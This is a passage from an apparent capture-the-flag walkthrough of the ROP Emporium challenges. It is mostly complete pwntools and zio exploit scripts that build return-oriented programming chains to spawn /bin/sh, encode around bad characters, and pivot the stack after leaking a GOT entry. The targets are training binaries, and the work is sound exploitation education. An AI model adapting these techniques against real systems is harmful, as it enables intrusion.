0x00007ffff7a63035 <+37>: add rsp,0x8
0x00007ffff7a63039 <+41>: movzx eax,al
0x00007ffff7a6303c <+44>: ret
End of assembler dump.
Yes, we can. Argument passing does not use the stack, so we only need to swap in the new address:
from zio import *
payload = "A"*40
payload += l64(0x00400883)
payload += l64(0x00601060)
payload += l64(0x4005e0)
io = zio('./split')
io.writeline(payload)
io.read()
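The 64-bit chain follows a fixed shape: gadget, value to pop into rdi, then the function to call. Below is a minimal standard-library sketch of that shape; call64_one_arg is a hypothetical helper name, and the addresses are the ones found above.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian integer."""
    return struct.pack("<Q", value)

POP_RDI_RET = 0x00400883  # pop rdi; ret
CAT_FLAG = 0x00601060     # "/bin/cat flag.txt" in .data
SYSTEM_PLT = 0x004005e0   # system@plt

def call64_one_arg(func_addr, arg):
    # pop rdi loads `arg` from the stack, then ret jumps to func_addr.
    return p64(POP_RDI_RET) + p64(arg) + p64(func_addr)

payload = b"A" * 40 + call64_one_arg(SYSTEM_PLT, CAT_FLAG)
```

No fake return address sits between the function and its argument here, because the argument travels in a register rather than on the stack.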
callme32
Here we meet the PLT for real. According to the challenge hints, callme32 imports three special functions from the shared library libcallme32.so:
$ rabin2 -i callme32 | grep callme
ordinal=004 plt=0x080485b0 bind=GLOBAL type=FUNC name=callme_three
ordinal=005 plt=0x080485c0 bind=GLOBAL type=FUNC name=callme_one
ordinal=012 plt=0x08048620 bind=GLOBAL type=FUNC name=callme_two
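We need to call callme_one(), callme_two() and callme_three() in that order, passing the arguments 1, 2, 3 to each of them. Debugging reveals the logic: callme_one reads in the encrypted flag, and callme_two and callme_three are then called in turn to decrypt it.
Because function arguments live on the stack, we need a pop;pop;pop;ret gadget to balance the stack: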
$ objdump -d callme32 | grep -A 3 pop
...
80488a8: 5b pop %ebx
80488a9: 5e pop %esi
80488aa: 5f pop %edi
80488ab: 5d pop %ebp
80488ac: c3 ret
80488ad: 8d 76 00 lea 0x0(%esi),%esi
...
An add esp, 8; pop; ret gadget works as well; anything that balances the stack will do:
gdb-peda$ ropsearch "add esp, 8"
Searching for ROP gadget: 'add esp, 8' in: binary ranges
0x08048576 : (b'83c4085bc3') add esp,0x8; pop ebx; ret
0x080488c3 : (b'83c4085bc3') add esp,0x8; pop ebx; ret
Build the payload as follows:
from zio import *
payload = "A"*44
payload += l32(0x080485c0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
payload += l32(0x08048620)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
payload += l32(0x080485b0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
io = zio('./callme32')
io.writeline(payload)
io.read()
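The repetition in this payload is easier to see as a loop. The sketch below rebuilds the same bytes with the standard library; chain_calls is a name invented for this example. The cleanup gadget is used as each call's return address, so its three pops discard the three arguments before the next call begins.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian integer."""
    return struct.pack("<I", value)

POP3_RET = 0x080488a9      # pop esi; pop edi; pop ebp; ret
CALLME_ONE = 0x080485c0    # callme_one@plt
CALLME_TWO = 0x08048620    # callme_two@plt
CALLME_THREE = 0x080485b0  # callme_three@plt

def chain_calls(funcs, args, cleanup):
    """Chain cdecl calls, each followed by a cleanup gadget and its args."""
    chain = b""
    for func in funcs:
        chain += p32(func) + p32(cleanup)
        chain += b"".join(p32(a) for a in args)
    return chain

payload = b"A" * 44 + chain_calls(
    [CALLME_ONE, CALLME_TWO, CALLME_THREE], (1, 2, 3), POP3_RET
)
```

Each call occupies five 4-byte words, so the three calls add 60 bytes after the 44 bytes of padding.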
callme
A 64-bit program does not need stack balancing; we just load the arguments into the registers in order.
$ rabin2 -i callme | grep callme
ordinal=004 plt=0x00401810 bind=GLOBAL type=FUNC name=callme_three
ordinal=008 plt=0x00401850 bind=GLOBAL type=FUNC name=callme_one
ordinal=011 plt=0x00401870 bind=GLOBAL type=FUNC name=callme_two
gdb-peda$ ropsearch "pop rdi; pop rsi"
Searching for ROP gadget: 'pop rdi; pop rsi' in: binary ranges
0x00401ab0 : (b'5f5e5ac3') pop rdi; pop rsi; pop rdx; ret
The payload is as follows:
from zio import *
payload = "A"*40
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401850)
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401870)
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401810)
io = zio('./callme')
io.writeline(payload)
io.read()
write432
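This time we can no longer find a ready-made command string in the program. Instead, we can use gadgets to write /bin/sh into the virtual memory of the target process, for example into the .data section, and then call system() on it to get a shell. The important point is that ROP is simply a form of arbitrary code execution; with some creativity, it can perform operations such as reading and writing memory.
Useful as this technique is, we still have to consider the read, write and execute permissions of the address we write to, how much space it offers, and whether what we write will interfere with program execution. Since we want to write the string into the .data section, let's look at its permissions and size: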
$ readelf -S write432
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[16] .rodata PROGBITS 080486f8 0006f8 000064 00 A 0 0 4
[25] .data PROGBITS 0804a028 001028 000008 00 WA 0 0 4
We can see that .data has the flags WA, meaning write and alloc, whereas .rodata is not writable.
The tool ropgadget makes it easy to find the gadgets we need:
$ ropgadget --binary write432 --only "mov|pop|ret"
...
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret
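Also note that this is a 32-bit program, so each write stores only 4 bytes and the string has to be written in two steps. We also have to watch alignment and characters that truncate the input (\x00, \x0a and so on). For example, /bin/sh is only seven bytes long, so we can use /bin/sh\00 or /bin//sh. Build the payload as follows: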
from zio import *
pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670
data_addr = 0x804a028
system_plt = 0x8048430
payload = ""
payload += "A"*44
payload += l32(pop_edi_ebp)
payload += l32(data_addr)
payload += "/bin"
payload += l32(mov_edi_ebp)
payload += l32(pop_edi_ebp)
payload += l32(data_addr+4)
payload += "/sh\x00"
payload += l32(mov_edi_ebp)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./write432')
io.writeline(payload)
io.interact()
$ python2 run.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(/binp,/shp0BBBB(�
write4 by ROP Emporium
32bits
Go ahead and give me the string already!
> cat flag.txt
ROPE{a_placeholder_32byte_flag!}
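The two-step write generalises to any string: pad it to a multiple of four bytes and emit one pop/mov pair per chunk. The following is a standard-library sketch under that assumption; write_string32 is a hypothetical helper, and the gadget addresses are the ones listed above.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian integer."""
    return struct.pack("<I", value)

POP_EDI_EBP = 0x080486da  # pop edi ; pop ebp ; ret
MOV_EDI_EBP = 0x08048670  # mov dword ptr [edi], ebp ; ret
DATA_ADDR = 0x0804a028    # start of .data (8 bytes, flags WA)

def write_string32(data, addr):
    """Build a chain that writes `data` to `addr`, 4 bytes per step."""
    data += b"\x00" * (-len(data) % 4)  # pad with NULs to a multiple of 4
    chain = b""
    for i in range(0, len(data), 4):
        chain += p32(POP_EDI_EBP)       # edi <- destination, ebp <- chunk
        chain += p32(addr + i)
        chain += data[i:i + 4]
        chain += p32(MOV_EDI_EBP)       # store the chunk at [edi]
    return chain

chain = write_string32(b"/bin/sh", DATA_ADDR)
```

With the padding byte, /bin/sh occupies exactly the 8 bytes that readelf reports for .data, and none of the resulting chain bytes is a newline that would cut fgets() short.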
write4
A 64-bit program can write the whole string in one go.
$ ropgadget --binary write4 --only "mov|pop|ret"
...
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
0x0000000000400893 : pop rdi ; ret
from pwn import *
pop_r14_r15 = 0x0000000000400890
mov_r14_r15 = 0x0000000000400820
pop_rdi = 0x0000000000400893
data_addr = 0x0000000000601050
system_plt = 0x004005e0
payload = "A"*40
payload += p64(pop_r14_r15)
payload += p64(data_addr)
payload += "/bin/sh\x00"
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)
io = process('./write4')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
badchars32
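In this challenge we still need to write /bin/sh into process memory, but this time the program checks the input for sensitive characters as it reads it. Look at the function checkBadchars():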
gdb-peda$ disassemble checkBadchars
Dump of assembler code for function checkBadchars:
0x08048801 <+0>: push ebp
0x08048802 <+1>: mov ebp,esp
0x08048804 <+3>: sub esp,0x10
0x08048807 <+6>: mov BYTE PTR [ebp-0x10],0x62
0x0804880b <+10>: mov BYTE PTR [ebp-0xf],0x69
0x0804880f <+14>: mov BYTE PTR [ebp-0xe],0x63
0x08048813 <+18>: mov BYTE PTR [ebp-0xd],0x2f
0x08048817 <+22>: mov BYTE PTR [ebp-0xc],0x20
0x0804881b <+26>: mov BYTE PTR [ebp-0xb],0x66
0x0804881f <+30>: mov BYTE PTR [ebp-0xa],0x6e
0x08048823 <+34>: mov BYTE PTR [ebp-0x9],0x73
0x08048827 <+38>: mov DWORD PTR [ebp-0x4],0x0
0x0804882e <+45>: mov DWORD PTR [ebp-0x8],0x0
0x08048835 <+52>: mov DWORD PTR [ebp-0x4],0x0
0x0804883c <+59>: jmp 0x804887c <checkBadchars+123>
0x0804883e <+61>: mov DWORD PTR [ebp-0x8],0x0
0x08048845 <+68>: jmp 0x8048872 <checkBadchars+113>
0x08048847 <+70>: mov edx,DWORD PTR [ebp+0x8]
0x0804884a <+73>: mov eax,DWORD PTR [ebp-0x4]
0x0804884d <+76>: add eax,edx
0x0804884f <+78>: movzx edx,BYTE PTR [eax]
0x08048852 <+81>: lea ecx,[ebp-0x10]
0x08048855 <+84>: mov eax,DWORD PTR [ebp-0x8]
0x08048858 <+87>: add eax,ecx
0x0804885a <+89>: movzx eax,BYTE PTR [eax]
0x0804885d <+92>: cmp dl,al
0x0804885f <+94>: jne 0x804886e <checkBadchars+109>
0x08048861 <+96>: mov edx,DWORD PTR [ebp+0x8]
0x08048864 <+99>: mov eax,DWORD PTR [ebp-0x4]
0x08048867 <+102>: add eax,edx
0x08048869 <+104>: mov BYTE PTR [eax],0xeb
0x0804886c <+107>: jmp 0x8048878 <checkBadchars+119>
0x0804886e <+109>: add DWORD PTR [ebp-0x8],0x1
0x08048872 <+113>: cmp DWORD PTR [ebp-0x8],0x7
0x08048876 <+117>: jbe 0x8048847 <checkBadchars+70>
0x08048878 <+119>: add DWORD PTR [ebp-0x4],0x1
0x0804887c <+123>: mov eax,DWORD PTR [ebp-0x4]
0x0804887f <+126>: cmp eax,DWORD PTR [ebp+0xc]
0x08048882 <+129>: jb 0x804883e <checkBadchars+61>
0x08048884 <+131>: nop
0x08048885 <+132>: leave
0x08048886 <+133>: ret
End of assembler dump.
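Clearly, the bytes stored by the instructions from 0x08048807 to 0x08048823 are the so-called sensitive characters (bad characters). Handling bad characters comes up often in exploit development; it is not only arguments that need encoding, sometimes addresses do too. Here we use a simple XOR operation to encode and decode the string.
Find the gadgets: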
$ ropgadget --binary badchars32 --only "mov|pop|ret|xor"
...
0x08048893 : mov dword ptr [edi], esi ; ret
0x08048896 : pop ebx ; pop ecx ; ret
0x08048899 : pop esi ; pop edi ; ret
0x08048890 : xor byte ptr [ebx], cl ; ret
The whole exploit encodes before writing and decodes before use. Here is the payload:
from zio import *
xor_ebx_cl = 0x08048890
pop_ebx_ecx = 0x08048896
pop_esi_edi = 0x08048899
mov_edi_esi = 0x08048893
system_plt = 0x080484e0
data_addr = 0x0804a038
# encode
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break
# write
payload = "A"*44
payload += l32(pop_esi_edi)
payload += binsh[:4]
payload += l32(data_addr)
payload += l32(mov_edi_esi)
payload += l32(pop_esi_edi)
payload += binsh[4:8]
payload += l32(data_addr + 4)
payload += l32(mov_edi_esi)
# decode
for i in range(len(binsh)):
    payload += l32(pop_ebx_ecx)
    payload += l32(data_addr + i)
    payload += l32(xor_byte)
    payload += l32(xor_ebx_cl)
# run
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./badchars32')
io.writeline(payload)
io.interact()
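The key search in the script can be isolated and checked on its own. The sketch below is a Python 3 restatement of that loop using bytes objects; find_xor_key is a name chosen for this example, and the bad-character list is the one read out of checkBadchars().

```python
# Bad characters from checkBadchars(): 'b', 'i', 'c', '/', ' ', 'f', 'n', 's'
BADCHARS = bytes([0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73])

def find_xor_key(plain, badchars=BADCHARS):
    """Return the first single-byte key whose encoding avoids all bad chars."""
    for key in range(1, 256):
        encoded = bytes(b ^ key for b in plain)
        if not any(b in badchars for b in encoded):
            return key, encoded
    raise ValueError("no single-byte XOR key avoids the bad characters")

key, encoded = find_xor_key(b"/bin/sh\x00")
# XOR is its own inverse, so applying the key again restores the string;
# this is what the xor byte ptr [ebx], cl gadget does in memory, byte by byte.
decoded = bytes(b ^ key for b in encoded)
print(key, encoded, decoded)
```

For this bad-character set the search stops at key 2, because key 1 turns 'b' into 'c', which is itself on the list.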
badchars
The 64-bit program works the same way; just pay attention to argument passing.
$ ropgadget --binary badchars --only "mov|pop|ret|xor"
...
0x0000000000400b34 : mov qword ptr [r13], r12 ; ret
0x0000000000400b3b : pop r12 ; pop r13 ; ret
0x0000000000400b40 : pop r14 ; pop r15 ; ret
0x0000000000400b30 : xor byte ptr [r15], r14b ; ret
0x0000000000400b39 : pop rdi ; ret
from pwn import *
pop_r12_r13 = 0x0000000000400b3b
mov_r13_r12 = 0x0000000000400b34
pop_r14_r15 = 0x0000000000400b40
xor_r15_r14b = 0x0000000000400b30
pop_rdi = 0x0000000000400b39
system_plt = 0x00000000004006f0
data_addr = 0x0000000000601000
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break
payload = "A"*40
payload += p64(pop_r12_r13)
payload += binsh
payload += p64(data_addr)
payload += p64(mov_r13_r12)
for i in range(len(binsh)):
    payload += p64(pop_r14_r15)
    payload += p64(xor_byte)
    payload += p64(data_addr + i)
    payload += p64(xor_r15_r14b)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)
io = process('./badchars')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
fluff32
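This exercise is not very different from the previous ones; the difficulty is that the gadgets we can find are less direct. One trick: since our goal is to write a string, we must need a gadget of the form mov [reg], reg, so we start there and work backwards to the other gadgets required.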
$ ropgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
...
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
We spot the gadget mov dword ptr [ecx], edx ;, which suggests putting the address in ecx and the data in edx so that the data is written to that address. The payload is as follows:
from zio import *
system_plt = 0x08048430
data_addr = 0x0804a028
pop_ebx = 0x080483e1
mov_ecx_edx = 0x08048693
xchg_edx_ecx = 0x08048689
xor_edx_ebx = 0x0804867b
xor_edx_edx = 0x08048671
def write_data(data, addr):
    # addr -> ecx
    payload = l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += l32(addr)
    payload += l32(xor_edx_ebx)
    payload += "BBBB"
    payload += l32(xchg_edx_ecx)
    payload += "BBBB"
    # data -> edx
    payload += l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += data
    payload += l32(xor_edx_ebx)
    payload += "BBBB"
    # edx -> [ecx]
    payload += l32(mov_ecx_edx)
    payload += "BBBB"
    payload += l32(0)
    return payload
payload = "A"*44
payload += write_data("/bin", data_addr)
payload += write_data("/sh\x00", data_addr + 4)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./fluff32')
io.writeline(payload)
io.interact()
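Because the gadgets have side effects, it helps to trace what each register holds. The sketch below emulates the register effects of one write_data() call in plain Python. It is a simplified model written for this example (only edx, ecx, ebx and one dword of memory are tracked), not a real emulator.

```python
import struct

def emulate_write(addr, data, memory):
    """Emulate the fluff32 register shuffling for one 4-byte write.

    `memory` maps an address to the 32-bit value stored there.
    """
    edx, ecx = 0xdefaced0, 0x0          # arbitrary starting values

    # addr -> ecx
    edx ^= edx                          # xor edx, edx
    ebx = addr                          # pop ebx
    edx ^= ebx                          # xor edx, ebx
    edx, ecx = ecx, edx                 # xchg edx, ecx
    edx = 0xdefaced0                    # side effect: mov edx, 0xdefaced0

    # data -> edx
    edx ^= edx                          # clear the clobbered edx again
    ebx = struct.unpack("<I", data)[0]  # pop ebx
    edx ^= ebx                          # xor edx, ebx

    # edx -> [ecx]
    memory[ecx] = edx                   # mov dword ptr [ecx], edx
    ebx = 0                             # pop ebx takes the trailing l32(0)
    memory[ecx] ^= ebx & 0xFF           # xor byte ptr [ecx], bl (no-op for bl = 0)
    return memory

memory = {}
emulate_write(0x0804a028, b"/bin", memory)
emulate_write(0x0804a02c, b"/sh\x00", memory)
written = struct.pack("<II", memory[0x0804a028], memory[0x0804a02c])
print(written)
```

The trace shows why the final l32(0) matters: the last gadget XORs the low byte of ebx into the first byte just written, so any non-zero value there would corrupt the string.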
fluff
Tip: when searching with ropgadget, adding the --depth option yields longer gadgets.
$ ropgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
...
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
from pwn import *
system_plt = 0x004005e0
data_addr = 0x0000000000601050
xor_r11_r11 = 0x0000000000400822
xor_r11_r12 = 0x000000000040082f
xchg_r11_r10 = 0x0000000000400840
mov_r10_r11 = 0x000000000040084c
pop_r12 = 0x0000000000400832
def write_data(data, addr):
    # addr -> r10
    payload = p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += p64(addr)
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"
    payload += p64(xchg_r11_r10)
    payload += "BBBBBBBB"
    # data -> r11
    payload += p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += data
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"
    # r11 -> [r10]
    payload += p64(mov_r10_r11)
    payload += "BBBBBBBB"*2
    payload += p64(0)
    return payload
payload = "A"*40
payload += write_data("/bin/sh\x00", data_addr)
payload += p64(system_plt)
io = process('./fluff')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
pivot32
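This is the last challenge, and the difficulty jumps. The first issue is the shared library. The relative positions of functions inside a shared library are fixed, so if we know the address of one function, we can derive the address of any other function from the offset between them. With ASLR enabled, the address at which the library is loaded changes, but the relative positions of its functions do not. So we need a way to leak the address of one function first and then compute the address of the target function.
Analysis shows that the program imports foothold_function() from the shared library libpivot32.so but never calls it in its own logic, and that libpivot32.so also contains the function we want, ret2win().
Now we know which function can be leaked, foothold_function(), but how do we leak it? We briefly covered lazy binding earlier: only when func@plt() is first called does the system write the real address of func() into its GOT entry, func.got.plt; func@plt() then jumps to the real func() through func.got.plt.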
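The address arithmetic behind the leak is simple enough to state as code. In the sketch below, the symbol offsets and the leaked address are hypothetical values chosen for illustration; only the difference of 0x1f7 between ret2win() and foothold_function() comes from this walkthrough.

```python
def resolve_from_leak(leaked_addr, known_sym, target_sym):
    """Compute a target's runtime address from one leaked address.

    known_sym and target_sym are offsets of the two functions inside
    the shared library file; their difference does not change under ASLR.
    """
    load_base = leaked_addr - known_sym
    return load_base + target_sym

# Hypothetical values, for illustration only.
FOOTHOLD_SYM = 0x770                 # assumed offset of foothold_function
RET2WIN_SYM = FOOTHOLD_SYM + 0x1f7   # 0x1f7 is the offset used in this section
leaked = 0xf7fc9770                  # assumed runtime address read from the GOT

ret2win_runtime = resolve_from_leak(leaked, FOOTHOLD_SYM, RET2WIN_SYM)
print(hex(ret2win_runtime))
```

In the exploit itself this addition has to be carried out by gadgets inside the target process, since the leaked value exists only at run time.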
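Finally, the most important part of this challenge. The program takes two inputs. The first is stored in a heap buffer allocated by malloc(), and to lower the difficulty the program deliberately prints that address. The second is placed on the stack, where the space available is limited to 13 bytes; that is not enough to do much, so we need a stack pivot: by overwriting the caller's ebp we move the stack frame somewhere else, and by controlling eip at the same time we change the program's execution flow. The usual payload (called the secondary payload here) is structured as follows: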
buffer padding | fake ebp | leave;ret addr |
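The function's return address is thus overwritten with the address of a leave;ret sequence, so after executing its own leave;ret the program executes leave;ret a second time.
The fake ebp points to the ebp slot of our other payload (called the main payload here), that is, the main payload's address minus 4. Alternatively, you can prepend 4 bytes of padding to the main payload to serve as the ebp: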
ebp | payload
Recall that a function's entry point usually looks like this:
push ebp
mov ebp,esp
The leave instruction is equivalent to:
mov esp,ebp
pop ebp
The ret instruction is equivalent to:
pop eip
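Suppose the stack overflow we control is too small to do all the work, and the program has PIE enabled or the system has ASLR enabled, but somewhere else in the program there is enough room to write a payload that can then be run. In that case we move the stack there.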
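The double leave;ret can be traced with a few lines of Python before looking at a debugger. The sketch below models only ebp, esp, eip and the four stack words that matter; the addresses are taken from the gdb session shown later in this section, and the helper names are chosen for this example.

```python
def leave(regs, mem):
    """leave: mov esp, ebp ; pop ebp"""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4

def ret(regs, mem):
    """ret: pop eip"""
    regs["eip"] = mem[regs["esp"]]
    regs["esp"] += 4

LEAVE_RET = 0x0804889f

mem = {
    0xffe7ec68: 0xf755cf0c,  # saved ebp overwritten with the fake ebp
    0xffe7ec6c: LEAVE_RET,   # return address overwritten with leave;ret
    0xf755cf0c: 0x00000000,  # ebp slot just before the main payload
    0xf755cf10: 0x080485f0,  # first word of the main payload (foothold_function@plt)
}
regs = {"ebp": 0xffe7ec68, "esp": 0xffe7ec40, "eip": LEAVE_RET}

# The function's own leave;ret, then the one we returned into.
for _ in range(2):
    leave(regs, mem)
    ret(regs, mem)

print({name: hex(value) for name, value in regs.items()})
```

After the second ret, esp points into the heap buffer and eip holds the first word of the main payload, which is the whole point of the pivot.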
The complete exploit is as follows:
from pwn import *
#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot32')
elf = ELF('./pivot32')
libp = ELF('./libpivot32.so')
leave_ret = 0x0804889f
foothold_plt = elf.plt['foothold_function'] # 0x080485f0
foothold_got_plt = elf.got['foothold_function'] # 0x0804a024
pop_eax = 0x080488c0
pop_ebx = 0x08048571
mov_eax_eax = 0x080488c4
add_eax_ebx = 0x080488c7
call_eax = 0x080486a3
foothold_sym = libp.symbols['foothold_function']
ret2win_sym = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x1f7
leakaddr = int(io.recv().split()[20], 16)
# calls foothold_function() to populate its GOT entry, then queries that value into EAX
#gdb.attach(io)
payload_1 = p32(foothold_plt)
payload_1 += p32(pop_eax)
payload_1 += p32(foothold_got_plt)
payload_1 += p32(mov_eax_eax)
payload_1 += p32(pop_ebx)
payload_1 += p32(offset)
payload_1 += p32(add_eax_ebx)
payload_1 += p32(call_eax)
io.sendline(payload_1)
# ebp = leakaddr-4, esp = leave_ret
payload_2 = "A"*40
payload_2 += p32(leakaddr-4) + p32(leave_ret)
io.sendline(payload_2)
print io.recvall()
Let's verify this in gdb by setting a breakpoint at the leave instruction in pwnme():
gdb-peda$ b *0x0804889f
Breakpoint 1 at 0x804889f
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xffe7ec68 --> 0xf755cf0c --> 0x0
ESP: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EIP: 0x804889f (<pwnme+173>: leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048896 <pwnme+164>: call 0x80485b0 <fgets@plt>
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
=> 0x804889f <pwnme+173>: leave
0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
0004| 0xffe7ec44 ('A' <repeats 36 times>, "\f\317U\367\237\210\004\b\n")
0008| 0xffe7ec48 ('A' <repeats 32 times>, "\f\317U\367\237\210\004\b\n")
0012| 0xffe7ec4c ('A' <repeats 28 times>, "\f\317U\367\237\210\004\b\n")
0016| 0xffe7ec50 ('A' <repeats 24 times>, "\f\317U\367\237\210\004\b\n")
0020| 0xffe7ec54 ('A' <repeats 20 times>, "\f\317U\367\237\210\004\b\n")
0024| 0xffe7ec58 ('A' <repeats 16 times>, "\f\317U\367\237\210\004\b\n")
0028| 0xffe7ec5c ('A' <repeats 12 times>, "\f\317U\367\237\210\004\b\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804889f in pwnme ()
gdb-peda$ x/10w 0xffe7ec68
0xffe7ec68: 0xf755cf0c 0x0804889f 0xf755000a 0x00000000
0xffe7ec78: 0x00000002 0x00000000 0x00000001 0xffe7ed44
0xffe7ec88: 0xf755cf10 0xf655d010
gdb-peda$ x/10w 0xf755cf0c
0xf755cf0c: 0x00000000 0x080485f0 0x080488c0 0x0804a024
0xf755cf1c: 0x080488c4 0x08048571 0x000001f7 0x080488c7
0xf755cf2c: 0x080486a3 0x0000000a
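Before the first leave;ret executes, EBP points to the stack slot holding the fake ebp, 0xf755cf0c, and the fake ebp points to the main payload's ebp slot. Right after the fake ebp comes the address of leave;ret, 0x0804889f, which is the return address.
Execute the first leave: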
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec6c --> 0x804889f (<pwnme+173>: leave)
EIP: 0x80488a0 (<pwnme+174>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
0x804889f <pwnme+173>: leave
=> 0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
0x80488a7 <uselessFunction+6>: call 0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec6c --> 0x804889f (<pwnme+173>: leave)
0004| 0xffe7ec70 --> 0xf755000a --> 0x0
0008| 0xffe7ec74 --> 0x0
0012| 0xffe7ec78 --> 0x2
0016| 0xffe7ec7c --> 0x0
0020| 0xffe7ec80 --> 0x1
0024| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0028| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
The value of EBP, 0xffe7ec68, is assigned to ESP; then 0xf755cf0c, the fake ebp, is popped off the stack into EBP, and ESP+4=0xffe7ec6c now points to the address of the second leave.
Execute the first ret:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec70 --> 0xf755000a --> 0x0
EIP: 0x804889f (<pwnme+173>: leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048896 <pwnme+164>: call 0x80485b0 <fgets@plt>
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
